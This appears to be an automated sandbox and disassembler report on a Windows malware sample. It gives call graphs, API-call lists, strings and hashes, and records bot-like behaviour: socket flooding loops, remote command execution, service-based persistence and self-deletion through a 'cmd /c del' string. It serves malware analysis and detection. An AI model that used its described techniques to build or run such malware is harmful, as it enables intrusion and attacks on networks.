406bd0 2 API calls 1750->1752 1751 408d18 RtlExitUserThread LoadLibraryA 6D0C6DE0 1764 408d5f 1751->1764 1753 4089af inet_addr 1752->1753 1756 406bd0 2 API calls 1753->1756 1754 408daf RtlExitUserThread LoadLibraryA 6D0C6DE0 LoadLibraryA 6D0C6DE0 1755 406c10 3 API calls 1754->1755 1757 408e30 socket 1755->1757 1758 4089d6 1756->1758 1762 408e72 1757->1762 1760 406bd0 2 API calls 1758->1760 1763 4089ec htonl 1760->1763 1761 406c10 LoadLibraryA 6D0C6DE0 inet_addr 1761->1764 1767 408ea8 RtlExitUserThread LoadLibraryA 6D0C6DE0 1762->1767 1769 408e86 sendto 1762->1769 1763->1748 1764->1754 1764->1761 1766 408680 socket htons connect closesocket 1764->1766 1774 408da6 Sleep 1764->1774 1765 408c23 wsprintfA 1768 408c47 inet_addr 1765->1768 1766->1764 1777 408f2e 1767->1777 1770 406c10 3 API calls 1768->1770 1769->1769 1771 408e9e Sleep 1769->1771 1770->1781 1771->1762 1772 408f80 RtlExitUserThread 1773->1748 1776 408ab1 Sleep 1773->1776 1774->1764 1775 406c10 3 API calls 1775->1777 1776->1748 1777->1772 1777->1775 1778 408680 4 API calls 1777->1778 1779 408f52 send 1778->1779 1780 408f7a Sleep 1779->1780 1780->1777 1781->1747 1781->1751 1781->1765 1782 408cd9 sendto 1781->1782 1782->1781 1783 408d09 Sleep 1782->1783 1783->1781 1784 408130 1802 408fb0 1784->1802 1787 408261 1788 408235 1788->1787 1789 4082f9 1788->1789 1790 4085da 1788->1790 1791 406c10 3 API calls 1789->1791 1792 4085fe WSACleanup 1790->1792 1793 408355 inet_ntoa inet_addr 1791->1793 1794 4085e6 1792->1794 1796 4083ab 1793->1796 1797 4083c6 htonl 1796->1797 1800 4083f9 1797->1800 1798 408441 RtlExitUserThread 1798->1800 1799 4084ad sprintf inet_ntoa inet_addr htonl 1799->1800 1800->1798 1800->1799 1801 40858f sendto 1800->1801 1801->1800 1803 40815a 14 API calls 1802->1803 1803->1788 1804 406db0 LoadLibraryA 6D0C6DE0 LoadLibraryA 6D0C6DE0 1805 406bd0 2 API calls 1804->1805 1806 406e06 1805->1806 1807 406bd0 2 API calls 1806->1807 1808 406e15 1807->1808 1809 406c10 3 API calls 1808->1809 1810 406e5d socket 1809->1810 1812 406e9f 1810->1812 1813 406edc 7 API calls 1812->1813 1815 406eb3 sendto 1812->1815 1814 406f58 1813->1814 1817 406c10 3 API calls 1814->1817 1815->1815 1816 406ecb Sleep 1815->1816 1816->1812 1816->1813 1818 406f8a socket connect 1817->1818 1819 406fb2 1818->1819 1820 406fc7 1818->1820 1821 406bd0 2 API calls 1820->1821 1822 406fd1 1821->1822 1823 406bd0 2 API calls 1822->1823 1824 406fe0 1823->1824 1825 407036 RtlExitUserThread 1824->1825 1826 40701e send Sleep 1824->1826 1828 408fb0 1825->1828 1826->1824 1829 40705a 6 API calls 1828->1829 1830 4070c0 1829->1830 1831 4070d9 1830->1831 1832 406c10 3 API calls 1830->1832 1833 4070f7 1832->1833 1834 406bd0 2 API calls 1833->1834 1835 407143 1834->1835 1836 406bd0 2 API calls 1835->1836 1839 407152 1836->1839 1837 4071aa RtlExitUserThread 1842 4071e5 1837->1842 1838 40718d sendto 1838->1838 1838->1839 1839->1837 1839->1838 1840 407214 RtlExitUserThread 1841 406c10 3 API calls 1841->1842 1842->1840 1842->1841 1843 408680 4 API calls 1842->1843 1844 407208 Sleep 1843->1844 1844->1842 1845 403114 Sleep 1846 402dd5 1858 402a59 WSAStartup 1846->1858 1849 402f96 gethostname 1851 402fc8 gethostbyname 1849->1851 1852 4030ed WSACleanup 1849->1852 1850 4030f8 1851->1852 1856 402fe2 1851->1856 1852->1850 1853 402ff3 memset memcpy 1854 403036 memset sprintf 1853->1854 1854->1856 1855 403093 Sleep 1855->1856 1856->1852 1856->1853 1856->1854 1856->1855 1860 402ad0 8 API calls 1856->1860 1859 402a7d 1858->1859 1859->1849 1859->1850 1861 402b56 sprintf 1860->1861 1862 402b69 sprintf 1860->1862 1861->1862 1863 402be2 1862->1863 1864 402d62 1863->1864 1886 402a92 GetModuleFileNameA 1863->1886 1864->1856 1866 402bf0 Sleep memset sprintf 1867 402c31 1866->1867 1887 402a92 GetModuleFileNameA 1867->1887 1869 402c3e 1870 402d68 GetLocalTime memset sprintf WinExec Sleep 1869->1870 1871 402c4a memset sprintf 1869->1871 1870->1864 1872 402c7b 1871->1872 1888 402a92 GetModuleFileNameA 1872->1888 1874 402c88 1874->1870 1875 402c94 memset sprintf 1874->1875 1876 402cc5 1875->1876 1889 402a92 GetModuleFileNameA 1876->1889 1878 402cd2 1878->1870 1879 402cde memset sprintf 1878->1879 1880 402d0f 1879->1880 1890 402a92 GetModuleFileNameA 1880->1890 1882 402d1c 1882->1870 1883 402d24 memset sprintf 1882->1883 1884 402d55 1883->1884 1891 402a92 GetModuleFileNameA 1884->1891 1886->1866 1887->1869 1888->1874 1889->1878 1890->1882 1891->1864 1892 402a37 1893 402a3c LoadLibraryA 6D0C6DE0 1892->1893 1894 406b9a _exit 1895 40407c 9 API calls 1941 404044 socket connect 1895->1941 1898 403492 2 API calls 1899 404127 memset 1898->1899 1900 406090 44 API calls 1899->1900 1901 404146 1900->1901 1944 4034e5 wsprintfA LoadLibraryA 1901->1944 1903 40414e memcpy send 1905 40463d 1903->1905 1926 4041c2 1903->1926 1906 40423d memset 1945 403758 1906->1945 1908 403758 3 API calls 1908->1926 1909 404654 OpenMutexA 1912 404675 1909->1912 1913 404667 ReleaseMutex CloseHandle 1909->1913 1910 4043c8 lstrcpyn 1916 403135 CreateThread 1910->1916 1911 404497 OpenMutexA 1919 4044aa ReleaseMutex CloseHandle 1911->1919 1911->1926 1914 40351a 5 API calls 1912->1914 1913->1912 1920 40467b memset sprintf SHDeleteKeyA 1914->1920 1915 4045c4 GetTickCount wsprintfA 1923 4045f1 LoadLibraryA 6D0C6DE0 1915->1923 1916->1926 1917 404347 lstrcpyn lstrlen lstrcpyn 1921 403280 CreateThread 1917->1921 1918 40442d GetDesktopWindow ShellExecuteA 1918->1906 1919->1926 1925 40474f 1920->1925 1921->1926 1922 4042d9 lstrcpyn lstrlen lstrcpyn 1924 403311 CreateThread 1922->1924 1928 40461a WinExec 1923->1928 1924->1926 1927 40355b 12 API calls 1925->1927 1926->1905 1926->1906 1926->1908 1926->1909 1926->1910 1926->1911 1926->1915 1926->1917 1926->1918 1926->1922 1931 406bd0 LoadLibraryA 6D0C6DE0 1926->1931 1932 406bd0 2 API calls 1926->1932 1935 40475b 1926->1935 1929 404754 ExitProcess 1927->1929 1928->1906 1931->1926 1933 404529 wsprintfA 1932->1933 1934 404553 LoadLibraryA 6D0C6DE0 1933->1934 1934->1926 1936 40351a 5 API calls 1935->1936 1937 404761 memset sprintf SHDeleteKeyA 1936->1937 1938 404835 1937->1938 1939 40355b 12 API calls 1938->1939 1940 40483a WinExec ExitProcess 1939->1940 1942 404075 1941->1942 1943 404069 closesocket 1941->1943 1942->1898 1942->1905 1943->1942 1944->1903 1946 403771 select 1945->1946 1947 40376c 1945->1947 1946->1947 1948 4037a3 1946->1948 1947->1926 1948->1946 1948->1947 1949 4037a7 __WSAFDIsSet 1948->1949 1949->1946 1950 4037ba recv 1949->1950 1950->1947 1950->1948 1951 40387c 8 API calls 1997 40336c LoadLibraryA 6D0C6DE0 LoadLibraryA 6D0C6DE0 1951->1997 1954 403e32 1955 403492 2 API calls 1956 40391c memset 1955->1956 1957 406090 44 API calls 1956->1957 1958 40393b 1957->1958 2005 4034e5 wsprintfA LoadLibraryA 1958->2005 1960 403943 memcpy send 1960->1954 1966 4039b7 1960->1966 1962 403a32 memset 2006 4036c6 1962->2006 1964 4036c6 3 API calls 1964->1966 1965 403e49 OpenMutexA 1969 403e6a 1965->1969 1970 403e5c ReleaseMutex CloseHandle 1965->1970 1966->1954 1966->1962 1966->1964 1966->1965 1967 403bbd lstrcpyn 1966->1967 1968 403c8c OpenMutexA 1966->1968 1971 403db9 GetTickCount wsprintfA 1966->1971 1974 403b3c lstrcpyn lstrlen lstrcpyn 1966->1974 1975 403c22 GetDesktopWindow ShellExecuteA 1966->1975 1979 403ace lstrcpyn lstrlen lstrcpyn 1966->1979 1985 406bd0 LoadLibraryA 6D0C6DE0 1966->1985 1988 406bd0 2 API calls 1966->1988 1991 403f50 1966->1991 1973 403135 CreateThread 1967->1973 1968->1966 1976 403c9f ReleaseMutex CloseHandle 1968->1976 1972 40351a 5 API calls 1969->1972 1970->1969 1980 403de6 LoadLibraryA 6D0C6DE0 1971->1980 1977 403e70 memset sprintf SHDeleteKeyA 1972->1977 1973->1966 1978 403280 CreateThread 1974->1978 1975->1962 1976->1966 1982 403f44 1977->1982 1978->1966 1981 403311 CreateThread 1979->1981 1983 403e0f WinExec 1980->1983 1981->1966 1984 40355b 12 API calls 1982->1984 1983->1962 1986 403f49 ExitProcess 1984->1986 1985->1966 1989 403d1e wsprintfA 1988->1989 1990 403d48 LoadLibraryA 6D0C6DE0 1989->1990 1990->1966 1992 40351a 5 API calls 1991->1992 1993 403f56 memset sprintf SHDeleteKeyA 1992->1993 1994 40402a 1993->1994 1995 40355b 12 API calls 1994->1995 1996 40402f WinExec ExitProcess 1995->1996 2012 4029ce 1997->2012 2000 4033f2 memset strcspn strncpy strcspn atoi 2001 403445 2000->2001 2002 406c10 3 API calls 2001->2002 2003 40345f socket connect 2002->2003 2004 403482 2003->2004 2004->1954 2004->1955 2005->1960 2007 4036da 2006->2007 2008 4036df select 2006->2008 2007->1966 2008->2007 2011 403711 2008->2011 2009 403715 __WSAFDIsSet 2009->2008 2010 403728 recv 2009->2010 2010->2007 2010->2011 2011->2007 2011->2008 2011->2009 2015 4027b0 strlen malloc 2012->2015 2014 4029e8 _mbscpy strstr 2014->2000 2014->2001 2017 4027ed 2015->2017 2016 402967 realloc 2018 40281c 2016->2018 2017->2016 2017->2018 2018->2014 2019 4055bc 6 API calls 2020 405610 Sleep 2019->2020 2022 405681 6 API calls 2020->2022 2026 405798 2022->2026 2023 4057b0 2024 40580c WSAStartup CreateThread WSAStartup CreateThread 2023->2024 2038 405336 EnumResourceNamesA 2023->2038 2025 405846 2024->2025 2056 4030fd CreateThread 2025->2056 2026->2023 2029 4057a6 exit 2026->2029 2029->2023 2030 4057c4 wsprintfA 2039 405348 8 API calls 2030->2039 2031 405851 WaitForSingleObject CloseHandle 2035 405874 Sleep 2031->2035 2035->2025 2036 4057ec 2036->2024 2037 4057f5 CreateThread Sleep 2036->2037 2037->2024 2038->2030 2040 40543f 2039->2040 2041 405472 memset 2040->2041 2042 4054d0 2040->2042 2043 4054c9 2041->2043 2055 4034e5 wsprintfA LoadLibraryA 2042->2055 2043->2042 2044 40550a GetFileSize 2043->2044 2045 405546 CloseHandle 2044->2045 2046 405519 GlobalAlloc 2044->2046 2045->2042 2046->2045 2047 405529 ReadFile 2046->2047 2048 405551 CloseHandle BeginUpdateResourceA 2047->2048 2049 40553d GlobalFree 2047->2049 2050 405569 UpdateResourceA 2048->2050 2051 4055ac GlobalFree 2048->2051 2049->2045 2052 405584 lstrlen UpdateResourceA 2050->2052 2053 40559b EndUpdateResourceA 2050->2053 2051->2042 2052->2053 2053->2051 2054 4055a9 2053->2054 2054->2051 2055->2036 2056->2031

                                                                                              Callgraph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              • Opacity -> Relevance
                                                                                              • Disassembly available
                                                                                              callgraph 0 Function_00407440 13 Function_00407350 0->13 1 Function_00404044 2 Function_00405244 3 Function_00406BC4 4 Function_004036C6 5 Function_00406BC7 6 Function_00406A48 6->5 36 Function_0040597D 6->36 64 Function_00406BB2 6->64 7 Function_00405348 8 Function_004050CA 9 Function_0040604B 10 Function_0040604D 20 Function_0040355B 10->20 11 Function_004029CE 61 Function_004027B0 11->61 12 Function_0040484F 48 Function_00406C10 12->48 29 Function_00408FF0 13->29 14 Function_00406C50 15 Function_00406BD0 46 Function_00408F90 15->46 16 Function_00402AD0 51 Function_00402A92 16->51 17 Function_00402DD5 17->16 19 Function_00402A59 17->19 18 Function_00403758 21 Function_004069E0 22 Function_004051E3 38 Function_0040507D 22->38 57 Function_00405126 22->57 23 Function_004027E4 44 Function_0040298D 23->44 24 Function_004034E5 25 Function_00408FE5 26 Function_004067E9 27 Function_004037EA 28 Function_0040336C 28->11 28->48 30 Function_00407470 30->0 30->14 30->15 39 Function_004085FE 30->39 41 Function_00408680 30->41 30->46 30->48 55 Function_00408620 30->55 56 Function_00407220 30->56 62 Function_00408FB0 30->62 31 Function_004086F0 31->15 31->41 31->46 31->48 31->55 32 Function_004059F4 33 Function_004085FB 34 Function_0040407C 34->1 34->15 34->18 34->20 34->24 40 Function_00403280 34->40 47 Function_00406090 34->47 49 Function_00403311 34->49 50 Function_00403492 34->50 53 Function_0040351A 34->53 65 Function_00403135 34->65 35 Function_0040387C 35->4 35->15 35->20 35->24 35->28 35->40 35->47 35->49 35->50 35->53 35->65 36->20 36->32 45 Function_00405B10 36->45 37 Function_004030FD 40->37 42 Function_00405182 42->8 42->38 43 Function_0040588B 45->10 45->15 47->21 49->37 52 Function_00403114 54 Function_00406B9A 56->29 58 Function_004027A8 58->44 59 Function_004048AA 59->12 59->15 59->20 59->24 59->27 59->40 59->47 59->49 59->50 59->53 59->65 60 Function_00408130 60->39 60->46 60->48 60->55 60->62 61->44 63 Function_00406DB0 63->15 63->41 63->48 63->62 65->37 66 Function_00405336 67 Function_00402A37 68 Function_004055BC 68->7 68->24 68->37 68->66

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00405992
                                                                                                • Part of subcall function 004059F4: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                                                                                • Part of subcall function 004059F4: 6D0C6DE0.KERNEL32(00000000), ref: 00405A10
                                                                                                • Part of subcall function 004059F4: _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                                                                                • Part of subcall function 004059F4: _mbscat.MSVCRT ref: 00405AD7
                                                                                                • Part of subcall function 004059F4: RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 004059BB
                                                                                              • ExitProcess.KERNEL32 ref: 004059EE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CtrlDispatcherExitLibraryLoadOpenProcessServiceStartStartup_mbscat_mbscpy
                                                                                              • String ID: Defghi Klmnopqr Tuv$Defghi Klmnopqr Tuvwxyab Defg$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq
                                                                                              • API String ID: 2992414417-1370363722
                                                                                              • Opcode ID: 83e1352e72bf4f9bd4512c402b146e2ee333a0580aff940d61e14a20f462f08e
                                                                                              • Instruction ID: 2c600e66c56aa54e41322d3d423351a33ef688bbf1abba83ec879d044cf264d1
                                                                                              • Opcode Fuzzy Hash: 83e1352e72bf4f9bd4512c402b146e2ee333a0580aff940d61e14a20f462f08e
                                                                                              • Instruction Fuzzy Hash: E8F090B0950209BBDB10BB919C0E7AE76B8EB0430AF40403AE501B00E2DBB85648CF6E

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405B47
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405B50
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenSCManagerA), ref: 00405B5E
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405B61
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenServiceA), ref: 00405B6F
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405B72
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,CloseServiceHandle), ref: 00405B80
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405B83
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA), ref: 00405B95
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405B98
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegSetValueExA), ref: 00405BA6
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405BA9
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,StartServiceA), ref: 00405BB7
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405BBA
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyA), ref: 00405BC8
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405BCB
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,UnlockServiceDatabase), ref: 00405BD9
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405BDC
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,ChangeServiceConfig2A), ref: 00405BEA
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405BED
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,CreateServiceA), ref: 00405BFB
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405BFE
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,LockServiceDatabase), ref: 00405C09
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405C0C
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00405C24
                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00405C32
                                                                                              • strlen.MSVCRT ref: 00405C3F
                                                                                              • strncmp.MSVCRT ref: 00405C53
                                                                                              • wsprintfA.USER32 ref: 00405CB5
                                                                                              • _mbscat.MSVCRT ref: 00405CC7
                                                                                              • _mbscat.MSVCRT ref: 00405CDA
                                                                                              • memset.MSVCRT ref: 00405D00
                                                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000104), ref: 00405D13
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00405D45
                                                                                              • GetLastError.KERNEL32 ref: 00405E3E
                                                                                                • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
                                                                                                • Part of subcall function 00406BD0: 6D0C6DE0.KERNEL32(00000000), ref: 00406BE2
                                                                                              • _mbscpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services\), ref: 00405F8E
                                                                                              • _mbscat.MSVCRT ref: 00405F9D
                                                                                              • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00405FB8
                                                                                              • lstrlen.KERNEL32(004059DB), ref: 00406014
                                                                                                • Part of subcall function 0040604D: CloseServiceHandle.ADVAPI32(?,0040603C), ref: 0040605B
                                                                                                • Part of subcall function 0040604D: RegCloseKey.KERNEL32(?,0040603C), ref: 00406083
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$_mbscat$CloseOpen_mbscpy$DirectoryErrorFileHandleLastManagerModuleNameServiceWindowslstrlenmemsetstrlenstrncmpwsprintf
                                                                                              • String ID: %c%c%c%c%c%c.exe$ADVAPI32.dll$ChangeServiceConfig2A$CloseServiceHandle$CopyFileA$CreateServiceA$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq$Description$KERNEL32.dll$LockServiceDatabase$OpenSCManagerA$OpenServiceA$RegCloseKey$RegOpenKeyA$RegSetValueExA$SYSTEM\CurrentControlSet\Services\$StartServiceA$UnlockServiceDatabase
                                                                                              • API String ID: 1957042094-766656692
                                                                                              • Opcode ID: 4b3913a236ff868ac2d24959da058726aa9527939866c3b61e1db7a2032d7c53
                                                                                              • Instruction ID: cb804ed11c5d1b7d2f4ad966b6bff0d4186705c14a699b97b59b11ec4e5a602e
                                                                                              • Opcode Fuzzy Hash: 4b3913a236ff868ac2d24959da058726aa9527939866c3b61e1db7a2032d7c53
                                                                                              • Instruction Fuzzy Hash: BCE168B1C0426CABDB229B65CC49BDEBEBCAF15744F0440EAE10CB6191C7B95B848F65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 33 4059f4-405afe LoadLibraryA 6D0C6DE0 _mbscpy _mbscat RegOpenKeyExA 34 405b00-405b08 33->34 35 405b0a 33->35 36 405b0c-405b0f 34->36 35->36
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00405A10
                                                                                              • _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                                                                              • _mbscat.MSVCRT ref: 00405AD7
                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadOpen_mbscat_mbscpy
                                                                                              • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$M$RegCloseKey$S$S$S$S$SYSTEM\CurrentControlSet\Services\$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                                                                              • API String ID: 3494547092-1712674794
                                                                                              • Opcode ID: 144e551ac243e5fd7547a2f692bcd48759d7fa28a844e17c41491cb02200368e
                                                                                              • Instruction ID: 35d77256bc8034983bafe4ceb320269e5385723e05cff16902321712d41d725d
                                                                                              • Opcode Fuzzy Hash: 144e551ac243e5fd7547a2f692bcd48759d7fa28a844e17c41491cb02200368e
                                                                                              • Instruction Fuzzy Hash: EA410F11D0C2C9E9EB12D2A8C9097DEBFB54B16749F0840D9D2847A2D2C2FE575887B6

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00403571
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00403578
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                                                                              • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                                                                              • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                                                                              • SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                                                                              • GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                                                                              • SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                                                                              • GetCurrentThread.KERNEL32 ref: 0040369B
                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 004036A2
                                                                                              • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 004036B4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Priority$ClassCurrentNameThread$ChangeEnvironmentExecuteFileLibraryLoadModuleNotifyPathProcessShellShortVariable
                                                                                              • String ID: > nul$/c del $<$COMSPEC$KERNEL32.dll$O$e$lstrcatA$n$p
                                                                                              • API String ID: 3031387768-2260071220
                                                                                              • Opcode ID: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                                                                              • Instruction ID: e1efa2a12065ff2590d5ce24305b170e8e226b043a9d1efffb27e628f7bfc04e
                                                                                              • Opcode Fuzzy Hash: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                                                                              • Instruction Fuzzy Hash: 4B413E72D0125DBFDB118BA4DD48BDEBFBCAB08345F0444B6E209F61A0D6745A88CF64

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                              • String ID:
                                                                                              • API String ID: 801014965-0
                                                                                              • Opcode ID: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                                                                              • Instruction ID: ce64524e5db3081824dfc069b3bde325727510d573eb5451e936e5ebab442623
                                                                                              • Opcode Fuzzy Hash: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                                                                              • Instruction Fuzzy Hash: 0F417EB1900364AFCB249FA5DD85AAA7BB8EB09710B20013FF592B72E1D7785940CB18

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 77 40604d-406053 78 406061-406067 77->78 79 406055-40605b CloseServiceHandle 77->79 80 406075-40607b 78->80 81 406069 78->81 79->78 82 406089-40608e call 40355b 80->82 83 40607d-406083 RegCloseKey 80->83 81->80 83->82
                                                                                              APIs
                                                                                              • CloseServiceHandle.ADVAPI32(?,0040603C), ref: 0040605B
                                                                                              • RegCloseKey.KERNEL32(?,0040603C), ref: 00406083
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close$HandleService
                                                                                              • String ID:
                                                                                              • API String ID: 907781861-0
                                                                                              • Opcode ID: 0fc39f7a8f2487042266e07f84277f59886f5ccd935bfb1c6061035c46bae3c1
                                                                                              • Instruction ID: 1f8c146e6fe937cb65407d64c7b6e595c96462481ae191be37c374c023957cce
